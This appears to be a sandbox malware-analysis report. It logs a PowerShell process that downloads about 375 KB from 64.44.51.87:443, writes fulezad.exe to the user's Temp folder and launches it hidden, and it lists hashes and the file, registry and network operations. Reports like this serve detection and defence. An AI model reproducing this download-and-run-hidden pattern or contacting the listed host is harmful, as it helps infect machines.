| C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | 372.83 KB |
MD5:
a748a4e6151f6d75cf93b2f899df23df
SHA1: 08f90b5474ba8e250d9b824602fe4cec6366bc48 SHA256: 2044fcca53a6dc26425147b78971bee2225f4e8ea3e096100e4edfbad1dac16d SSDeep: 6144:X11gGxJkPcgfqAAJ6ONxZ4cYjxfaQYf1QbicnRcftAhQgGNxRUc:X11goJkP/NAJEcYd7YfEc+AB |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | 0.33 KB |
MD5:
825763db503404345d0cc6f1b9cc16b4
SHA1: 7b1fdd67816f4ec32f3673336b49362b9972dd69 SHA256: a70303fc51b8ebb51ce502ef629196d27e2ad710c650aac0fe4dbb217c0f394c SSDeep: 6:kKm59WanMjIFqDlaG4Y+SkQlPlEGYRMY9z+4KlDA3RUegKt:wnzg4GokPlE99SNxAhUe/ |
|
|
| c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | 0.33 KB |
MD5:
5e8dc82a175be5b2da59a5d669aee40b
SHA1: 1e8122a54a8149edd17a7c55b9d5e8747624b66d SHA256: 6394e151640d8df4745643c2ece2371c26912604d7cd6cc5f5731b0c00dabedd SSDeep: 6:kKmh81zDlaG4Y+SkQlPlEGYRMY9z+4KlDA3RUegKt:W0z4GokPlE99SNxAhUe/ |
|
|
Host Behavior
File (273)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
6 | |
| Get Info | - | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
44 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
2 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
68 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
8 | |
| Read | - | size = 4096, size_out = 2228 |
|
1 | |
| Read | - | size = 844, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
2 | |
| Read | - | size = 4096, size_out = 3736 |
|
1 | |
| Read | - | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
5 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | size = 16384 |
|
23 |
Registry (122)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | System | - |
|
1 | |
| Open Key | System\PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | show_window = SW_HIDE |
|
1 | |
| Get Info | - | type = PROCESS_BASIC_INFORMATION |
|
1 |
Module (5)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (8)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Certificate Store | encoding_type = 65537, flags = 8708 |
|
1 | |
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Release | - |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (126)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
116 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp |
|
4 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 522 bytes |
| Total Data Received | 374.99 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 64.44.51.87:443 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x4d8 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 64.44.51.87 |
| Remote Port | 443 |
| Local Address | 0.0.0.0 |
| Local Port | 49163 |
| Data Sent | 522 bytes |
| Data Received | 374.99 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 64.44.51.87, remote_port = 443 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 95, size_out = 95 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 81, size_out = 81 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 875, size_out = 875 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4, size_out = 4 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 326, size_out = 326 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 48, size_out = 48 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 101, size_out = 101 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 288, size_out = 288 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 14302 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2114, size_out = 2114 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 13219 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3197, size_out = 3197 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 7018 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 9398, size_out = 9398 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 2277 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 14139, size_out = 14139 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 1916 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 14500, size_out = 8760 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5740, size_out = 1460 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4280, size_out = 4280 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 4114 |
|
1 | |
